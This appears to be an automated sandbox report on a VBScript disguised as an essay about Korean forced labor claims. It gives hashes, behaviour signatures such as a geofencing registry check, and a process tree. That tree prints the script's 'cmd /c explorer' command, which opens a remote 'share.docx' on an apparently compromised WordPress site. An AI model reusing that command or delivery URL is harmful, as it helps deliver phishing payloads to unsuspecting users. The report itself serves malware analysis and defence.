Analysis
- max time kernel: 259s
- max time network: 289s
- platform: windows10-2004_x64
- resource: win10v2004-20240412-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 20/04/2024, 06:42
- Static task static1
- Behavioral task behavioral1: sample "Essay on Resolution of Korean Forced Labor Claims.vbs", resource win7-20240221-en
- Behavioral task behavioral2: sample "Essay on Resolution of Korean Forced Labor Claims.vbs", resource win10-20240404-en
- Behavioral task behavioral3: sample "Essay on Resolution of Korean Forced Labor Claims.vbs", resource win10v2004-20240412-en
- Behavioral task behavioral4: sample "Essay on Resolution of Korean Forced Labor Claims.vbs", resource win11-20240412-en
General
- Target: Essay on Resolution of Korean Forced Labor Claims.vbs
- Size: 27KB
- MD5: 75ec9f68a5b62705c115db5119a78134
- SHA1: 6209f948992fd18d4fc6fc6f89d9815369ac8931
- SHA256: ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
- SHA512: 82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
- SSDEEP: 384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  35    4320  WScript.exe
  40    4320  WScript.exe
  57    4320  WScript.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                 Process
  Key value queried  \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation  WScript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc                                                             Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS              msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  pid   Process
  4204  msedge.exe
  4204  msedge.exe
  3884  msedge.exe
  3884  msedge.exe
  2400  identity_helper.exe
  2400  identity_helper.exe
  700   msedge.exe
  700   msedge.exe
  700   msedge.exe
  700   msedge.exe
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
  pid   Process
  3884  msedge.exe (all 6 entries)
- Suspicious use of FindShellTrayWindow (25 IoCs)
  pid   Process
  3884  msedge.exe (all 25 entries)
- Suspicious use of SendNotifyMessage (24 IoCs)
  pid   Process
  3884  msedge.exe (all 24 entries)
- Suspicious use of WriteProcessMemory (64 IoCs; repeated entries collapsed, shown in order of first appearance)
  description                       pid   Process       procid_target
  PID 4320 wrote to memory of 3376  4320  WScript.exe   90
  PID 3376 wrote to memory of 2400  3376  cmd.exe       92
  PID 3084 wrote to memory of 3884  3084  explorer.exe  94
  PID 3884 wrote to memory of 3920  3884  msedge.exe    96
  PID 3884 wrote to memory of 380   3884  msedge.exe    98
  PID 3884 wrote to memory of 4204  3884  msedge.exe    99
  PID 3884 wrote to memory of 4012  3884  msedge.exe    100
Processes
- C:\Windows\System32\WScript.exe (PID 4320)
  Command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Essay on Resolution of Korean Forced Labor Claims.vbs"
  Signatures: Blocklisted process makes network request; Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (PID 3376)
    Command: "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\explorer.exe (PID 2400)
      Command: explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
- C:\Windows\explorer.exe (PID 3084)
  Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3884)
    Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
    Signatures: Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3920)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd10d446f8,0x7ffd10d44708,0x7ffd10d44718
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 380)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4204)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
      Signatures: Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4012)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3040)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 736)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 3260)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
    - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 2400)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
      Signatures: Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 556)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3888)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1292)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4008)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 700)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4856 /prefetch:2
      Signatures: Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\CompPkgSrv.exe (PID 2996)
  Command: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\CompPkgSrv.exe (PID 3968)
  Command: C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 152B
  MD5: 3d94406b964753cc5222ab1343f54bb1
  SHA1: a5e7de0781fa1fabb3cd89564f2e5693cb4dee16
  SHA256: fd9923a217cd8d2c44a63dbfe52ec262e7c80b1f1e50c6e0f21f8379c90e7762
  SHA512: 1ad2c144e7bbd809f400f8782586d3768fc82bcef39db986f766897c344efec77ab2c0b6d9c5ee2019ef5cf9ad0c46bdd25392cbc9dbf9ea80e800577f0fc598
- Filesize: 152B
  MD5: 49dde89f025a1cce8848473379f7c28f
  SHA1: b405956b33146b2890530e818b6aa74bba3afb88
  SHA256: d6d125ba686b825bb22ab967a346051780cab1f55fc68a2f3efdf3fb5598f96b
  SHA512: 53050344674d8886db66e25f42d97bf46b26229972631f857286c2a303897cda58d85ee8ca768bbfb1fc07e52567315ea85d57e39b5b382916700ec389946506
- Filesize: 499B
  MD5: e95520708877b213ed99c2e08c1a9db1
  SHA1: 8948fe9ec9ecbe46b0e1856d125a59ad4bbfe640
  SHA256: 7c527b497f9fb3e4db82462d5e7a1e495366e9f1183a708c9569ce42650fc691
  SHA512: 5440c1f849ae1d5bfe2c83ff186928713a6ed040aebdf0405e4c7f981504705647c93a030ec44bc5a9d2755ae746a77c28661347fbf97a8c64dad32d3a775b08
- Filesize: 5KB
  MD5: fcb85e39a754275e9bf8106eeb88ac58
  SHA1: ce7ba308508a286f36c184de01917041c9e8b347
  SHA256: 9391a2126133e9d177c4435056bb2884ba33f1530ee114a492658537beb1cf59
  SHA512: 1638400d339f837f20ffb566026bb07a54f328ea3b3360dc0726893e558f32bc566ecce6b6373255635dca38dc48ea8cc48f7fe91f61b695e0df6a58c84050dd
- Filesize: 6KB
  MD5: 5e964781288614f24d4f3986ac1f2f63
  SHA1: 28b26b06b747678bd22d9199eea36dda3e058838
  SHA256: d69223524f274d22b263b28c2510efb6c2bd796df7e3befb7f085545d1d59ad4
  SHA512: d5cf315cbd0b549eb069f1d077bf895122ec200a55a2f59be074002b6a745f31978ac3569c09a41634338a8ca97da0f275cf43deee8f3d78914394975c1853d5
- Filesize: 24KB
  MD5: 7c43199d1e5acf5a31e1cbef990fbc47
  SHA1: df7bd524b9b3175325c0aff3469ea7f2211d3061
  SHA256: 52a6fd2a2fff53c738c77a6385e7e1677f8990781699f78c63d5a4b0fe566d22
  SHA512: aae886642b40ffb0676534fd85abe43ab588526b8e952b12a1bcafc73cb05103c76aee4fa32cc18c74af6c59aa1dc84bcda09ebccb7d11adc79fee3bfc93e2d1
- Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
- Filesize: 11KB
  MD5: fa8f393f2823c003ed490927aead9096
  SHA1: 2f383373340e23408bab0a62cd0ae88b62fb6abf
  SHA256: 58d6bdfa5e8130e44ff8217db783456296041c832f34f44ad83dfc8783aa1ff2
  SHA512: 59995106fbafee26d9a46d7ff28c8c06a18862ea3e8886ce3505fdd7d6ade9938980dd9d4264876a41c6a7de673b9fd9bd80c1da56e3306753077726da262a06